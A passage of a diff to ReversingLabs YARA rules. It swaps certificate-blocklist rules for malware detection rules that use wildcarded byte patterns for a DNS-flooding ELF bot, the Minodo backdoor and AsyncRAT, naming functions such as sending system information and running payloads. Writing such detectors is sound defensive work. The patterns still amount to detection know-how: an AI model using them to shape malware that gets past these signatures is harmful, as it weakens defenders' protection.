+            ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? 31 C9
+            BA ?? ?? ?? ?? 31 F6 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D C3
+        }
+		$send_system_info_64 = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48
+            8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? BE ??
+            ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D3 31 F6 48 89 E7 48 C1 E3 ?? 89
+            C0 48 01 C3 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 31 48 89 D5 48 8D 7C 24
+            ?? 31 F6 89 C0 48 C1 E5 ?? 48 01 C5 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 2B 04 24 48 29
+            DD 48 8B 54 24 ?? 2B 54 24 ?? BF ?? ?? ?? ?? F2 48 0F 2A C5 69 C0 ?? ?? ?? ?? 01 D0
+            F2 0F 2A C8 F2 0F 5E C1 F2 0F 2C D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 BE ?? ?? ??
+            ?? BF ?? ?? ?? ?? 31 C0 41 89 D8 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? BA ?? ?? ?? ??
+            BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? BA ?? ?? ?? ??
+            BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B 5D C3
+        }
+		$parse_c2_commands_64 = {
+            41 57 31 C0 49 89 FF B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48
+            8D 9C 24 ?? ?? ?? ?? 40 88 B4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D A4 24 ??
+            ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 DF F3 48 AB C7 07 ?? ?? ?? ?? BF ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8D 43 ?? 48 89 84 24 ?? ?? ?? ?? 0F 1F 00 8B 3D ?? ?? ?? ?? 31 C9
+            BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B B4 24 ?? ??
+            ?? ?? 45 85 F6 0F 84 ?? ?? ?? ?? 31 C0 44 89 F6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84
+            24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ??
+            ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ??
+            ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 85
+            ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 48 AB 48 8B 84 24 ?? ??
+            ?? ?? 4C 8B 9C 24 ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B
+            84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            48 8B 84 24 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 94 24
+            ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ??
+            48 8B AC 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24
+            ?? ?? ?? ?? 4C 89 9C 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ??
+            4C 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24
+            ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ??
+            4C 89 A4 24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24
+            ?? ?? ?? ?? 49 89 57 ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 77 ?? 48 8D B4 24
+        }
+		$dns_flood_64_p1 = {
+            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 49 89
+            FC BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 89 D9 4C 89 E6 48 8D AC 24 ?? ?? ?? ?? F3 48 A5
+            8B 06 48 89 CB 89 07 0F B7 46 ?? 8B 35 ?? ?? ?? ?? 66 89 47 ?? BF ?? ?? ?? ?? 31 C0
+            E8 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 C7 04 24 ?? ??
+            66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? F7 35 ?? ??
+            ?? ?? 89 D2 8B 04 95 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 E6 89 C7 41 89 C5 E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ?? ?? 48 89 EF F3 48
+            AB 48 8D 7C 24 ?? BE ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ??
+            48 8D 7D ?? 48 8D 74 24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? 00
+            00 E8 ?? ?? ?? ?? 48 89 EE 48 89 DF C6 84 24 ?? ?? ?? ?? ?? C6 84 24
+        }
+		$dns_flood_64_p2 = {
+            66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00
+            ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? E8 ?? ?? ?? ?? 48 89 D9 8B 01 48 83 C1 ?? 8D 90
+            ?? ?? ?? ?? F7 D0 21 C2 81 E2 ?? ?? ?? ?? 74 ?? 89 D0 C1 E8 ?? F7 C2 ?? ?? ?? ?? 0F
+            44 D0 48 8D 41 ?? 48 0F 44 C8 00 D2 48 83 D9 ?? 48 29 D9 48 8D 84 0C ?? ?? ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? 66 C7 00 ?? ?? 66 C7 40 ?? ?? ?? 48 89 CB 8B 13 48 83 C3 ?? 8D
+            82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 48 8D 7C 24 ?? BE ?? ?? ?? ??
+            C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 53 ?? 48 0F 44 DA 00 C0 48 83 DB ?? 48 29 CB
+            E8 ?? ?? ?? ?? 8B 44 24 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 EE 89 84 24 ?? ?? ?? ?? 0F
+            B7 44 24 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 7D ?? 48 8D 74 24 ?? E8 ??
+            ?? ?? ?? 41 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 B9 ?? ??
+            ?? ?? 83 C3 ?? C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ??
+            ?? ?? 31 D2 48 8D B4 24 ?? ?? ?? ?? 31 C9 F7 35 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89
+            E0 44 89 EF 89 D2 8B 04 95 ?? ?? ?? ?? 48 63 D3 89 44 24 ?? E8 ?? ?? ?? ?? 49 83 84
+            24 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? BF ?? ?? ?? ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "William Richard John" and pe.signatures [ i ] . serial == "0c:15" and 1387324799 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $collect_system_information_32_p* ) ) and ( $send_system_info_32 ) and ( $parse_c2_commands_32 ) and ( all of ( $dns_flood_32_p* ) ) ) or ( ( all of ( $collect_system_information_64_p* ) ) and ( $send_system_info_64 ) and ( $parse_c2_commands_64 ) and ( all of ( $dns_flood_64_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0C0F : INFO FILE
+rule REVERSINGLABS_Win32_Backdoor_Minodo : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Minodo backdoor."
 		author = "ReversingLabs"
-		id = "919a62ba-2902-5088-ad92-9f1bae23e68f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "0eeff863-1a46-5b25-8780-5cd887e3b1e2"
+		date = "2023-06-07"
+		modified = "2023-06-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L315-L331"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0f8fda07dc362b7e04892446f1abe1e5f5717ee715824a2c1f6550096c366701"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Win64.Backdoor.Minodo.yara#L1-L110"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "807408699fe00c8d1170598050e533dd0d79bb170f2538b6b6227cda7410060b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Minodo"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dmitry Vasilev" and pe.signatures [ i ] . serial == "0c:0f" and 1386719999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_06A164Ec5978497741Ee6Cec9966871B : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6c73206d-3d5c-5540-a2e1-d00138d7e1b5"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L333-L349"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8a27015d94a3bd8543a8ca9202831ffc9c9e65f61bf26ed6825c3e746b6af0d4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$generate_system_id = {
+            40 55 53 56 57 41 56 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B F1 48 8D 55 ?? 48 8D
+            4D ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 DB 85 C0 75 ?? 66 C7 45 ?? ?? ?? 4C
+            8D 45 ?? 48 8D 55 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 66 C7 45 ?? ?? ?? 48 83 4D ?? ?? 4C 8D 4D ?? 4C 8D 45 ?? 8B CB 48 8B D3 BE ?? ??
+            ?? ?? 48 85 D2 7E ?? 44 8A 54 15 ?? EB ?? 44 8A 95 ?? ?? ?? ?? 41 8A 01 49 FF C1 48
+            FF C2 32 44 15 ?? 41 32 C2 41 32 00 49 FF C0 88 44 15 ?? 41 38 19 75 ?? 83 C9 ?? 4C
+            8D 4D ?? 41 38 18 75 ?? 83 C9 ?? 4C 8D 45 ?? 48 3B D6 75 ?? 83 C9 ?? 48 8B D3 83 F9
+            ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 48 8D 5D ?? 49 8B FE 44
+            0F B6 03 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 83 C7 ?? 48 FF C3 48 FF CE 75 ??
+            FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 8B D8 FF 15 ?? ?? ?? ?? 48 8D 55
+            ?? 44 8B CB 4D 8B C6 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5E 5F 5E 5B
+            5D C3
+        }
+		$generate_encrypt_and_send_key = {
+            48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 48 89 78 ?? 41 56 48 81 EC ?? ?? ?? ??
+            8B F2 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 40 ?? 48 8B 08 8B 09
+            E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 45 33 C0 45 8D 70 ?? 41 8D 50 ?? 41 8B CE E8
+            ?? ?? ?? ?? 48 8B D8 83 F8 ?? 74 ?? 41 8D 6E ?? 48 8D 44 24 ?? 8B CD C6 00 ?? 48 FF
+            C0 48 FF C9 75 ?? 0F B7 CE 66 44 89 74 24 ?? E8 ?? ?? ?? ?? 48 8B CF 66 89 44 24 ??
+            E8 ?? ?? ?? ?? 48 63 FB 48 8D 54 24 ?? 48 8B CF 44 8B C5 89 44 24 ?? E8 ?? ?? ?? ??
+            85 C0 74 ?? 48 8B CF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? BE ?? ?? ??
+            ?? 48 8B CD 8B D6 E8 ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 33 C9 8A 44 29 ?? 48 FF C9 88
+            44 0C ?? 48 FF CE 75 ?? 8D 56 ?? 44 8D 46 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B CF
+            8B F0 85 C0 74 ?? 48 8D 54 24 ?? 45 33 C9 44 8B C0 E8 ?? ?? ?? ?? 3B C6 74 ?? 48 8B
+            CF E8 ?? ?? ?? ?? 33 DB 8B C3 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 6B ?? 49 8B
+            73 ?? 49 8B 7B ?? 49 8B E3 41 5E C3
+        }
+		$get_encrypt_and_send_system_info = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ??
+            8B F1 48 8B CA 48 8B DA FF 15 ?? ?? ?? ?? C6 44 24 ?? ?? 48 63 F8 40 88 7C 24 ?? 4C
+            8B C7 85 C0 74 ?? 48 8D 44 24 ?? 48 2B D8 48 8D 4C 24 ?? 49 FF C8 4A 8D 0C 01 8A 04
+            0B 88 01 75 ?? 83 C7 ?? 48 63 DF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? F6 D8 48 8D 45 ?? 1A
+            C9 80 E1 ?? 80 C9 ?? FF C7 88 4C 1C ?? 8B CA C6 00 ?? 48 FF C0 48 FF C9 75 ?? 48 8D
+            4D ?? 89 55 ?? FF 15 ?? ?? ?? ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48 63
+            CF FF C7 BB ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48
+            63 CF FF C7 4C 8D 85 ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 D7 88 44 14 ?? 8B 45 ??
+            FF C7 48 63 D7 8D 4B ?? C6 44 24 ?? ?? 89 44 14 ?? 48 8D 54 24 ?? 83 C7 ?? 89 9D ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C0 8D 48 ?? 03 CF
+            48 63 D1 48 83 FA ?? 76 ?? 44 8D 43 ?? 44 2B C7 48 63 C7 FF C7 4C 8D 54 24 ?? 44 88
+            44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74 ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B
+            CA 48 FF C9 41 8A 04 09 88 01 48 FF CA 75 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? 41
+            03 F8 C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ??
+            ?? ?? 44 8B C0 8D 48 ?? 03 CF 48 63 D1 48 83 FA ?? 76 ?? 41 B8 ?? ?? ?? ?? 44 2B C7
+            48 63 C7 FF C7 4C 8D 54 24 ?? 44 88 44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74
+            ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B CA 48 FF C9 42 8A 04 09 88 01 48 FF CA 75 ?? 4C
+            8D 4C 24 ?? 48 8D 54 24 ?? 44 03 C7 8B CE E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49
+            8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3
+        }
+		$copy_payload_into_allocated_memory = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 56 57 41 56 48 83 EC ?? 49 8B D8 48 63 F2 48 8B F9 41
+            C6 00 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 66 C7 03 ?? ?? B8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 4C 8D 4C 24 ?? 4C 8D 44 24 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ??
+            8B E8 85 C0 74 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D6 33 C9 4C 8B F6 FF 15
+            ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 66 C7 03 ?? ?? FF 15 ?? ?? ?? ?? 89 43 ?? 8D 46
+            ?? EB ?? 4D 8B C6 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 83 64 24 ?? ??
+            4C 8D 04 2E 45 33 C9 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 8B 44
+            24 ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 48 83 C4 ?? 41 5E 5F 5E C3
+        }
+		$execute_payload_from_temp = {
+            40 53 48 81 EC ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4C 8B D1 48 8D 44 24 ?? 41 8B D0 33 DB
+            88 18 48 FF C0 48 FF CA 75 ?? 48 8D 44 24 ?? 8D 4A ?? 88 18 48 FF C0 48 FF C9 75 ??
+            48 8D 44 24 ?? 44 89 44 24 ?? 45 33 C9 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C0 48 89
+            44 24 ?? 48 89 5C 24 ?? 48 89 5C 24 ?? 49 8B D2 89 5C 24 ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 89 5C 24 ?? 66 89 9C 24 ?? ?? 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C
+            24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B0 ?? EB ?? 32 C0 48 81 C4
+            ?? ?? ?? ?? 5B C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JOHN WILLIAM RICHARD" and pe.signatures [ i ] . serial == "06:a1:64:ec:59:78:49:77:41:ee:6c:ec:99:66:87:1b" and 1385596799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $generate_system_id ) and ( $generate_encrypt_and_send_key ) and ( $get_encrypt_and_send_system_info ) and ( $copy_payload_into_allocated_memory ) and ( $execute_payload_from_temp )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1121Ed568764E75Be35574448Feadefcd3Bc : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Asyncrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AsyncRAT backdoor."
 		author = "ReversingLabs"
-		id = "44fa007f-f5f7-5001-8b92-eb4a657ea756"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "78ff36e1-1620-50f4-8abd-adcf8b1242da"
+		date = "2024-05-22"
+		modified = "2024-05-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L351-L367"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3316a2536920c5aa9dd627cec7678e6fe33c722b4830dd740009c20dd013c9ab"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/ByteCode.MSIL.Backdoor.AsyncRAT.yara#L1-L149"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "53a13975cd53b571910f951adc44707c11b86c003eeb7b88dbe701253645ac89"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "AsyncRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FRINORTE COMERCIO DE PECAS E SERVICOS LTDA - ME" and pe.signatures [ i ] . serial == "11:21:ed:56:87:64:e7:5b:e3:55:74:44:8f:ea:de:fc:d3:bc" and 1385337599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6Ed2450Ceac0F72E73Fda1727E66E654 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c19ddbde-eec0-5ebb-8f11-1e7dcb489bc8"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L369-L385"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0e5af7795c825367d441c8abc2aa835fa83083eb8ee1f723c7d2dacff1ca88ff"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$read_server_data_v1 = {
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 28 ??
+            ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0A 06 16 3E ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 06 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 6A 59 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 3A ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6A 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 16 6A 3E ?? ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ?? ?? ??
+            ?? 69 6F ?? ?? ?? ?? 0B 07 16 3D ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 07 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 6A 59 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 16 6A 3C ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 30 ??
+            14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 16 6A 28 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 38 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 3C ?? ?? ?? ?? 16
+            28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ??
+            ?? ?? ?? 69 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 38 ?? ??
+            ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD
+        }
+		$send_v1 = {
+            28 ?? ?? ?? ?? 0A 16 0B 06 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DD ??
+            ?? ?? ?? 02 8E 69 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ??
+            ?? ?? 08 16 08 8E 69 6F ?? ?? ?? ?? 02 8E 69 20 ?? ?? ?? ?? 3E ?? ?? ?? ?? 02 73 ??
+            ?? ?? ?? 0D 16 13 ?? 09 16 6A 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 38
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25
+            13 ?? 16 30 ?? DD ?? ?? ?? ?? 09 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ??
+            15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 07 39 ?? ?? ?? ??
+            06 28 ?? ?? ?? ?? DC
+        }
+		$read_packet_v1_p1 = {
+            73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 02 74 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B
+            07 28 ?? ?? ?? ?? 0C 08 20 4F 01 89 64 42 ?? ?? ?? ?? 08 20 7A 39 BA 13 42 ?? ?? ??
+            ?? 08 20 D4 CA CD 0C 3B ?? ?? ?? ?? 08 20 7A 39 BA 13 3B ?? ?? ?? ?? 38 ?? ?? ?? ??
+            08 20 2B C2 32 1B 3B ?? ?? ?? ?? 08 20 E2 A2 F4 57 3B ?? ?? ?? ?? 08 20 4F 01 89 64
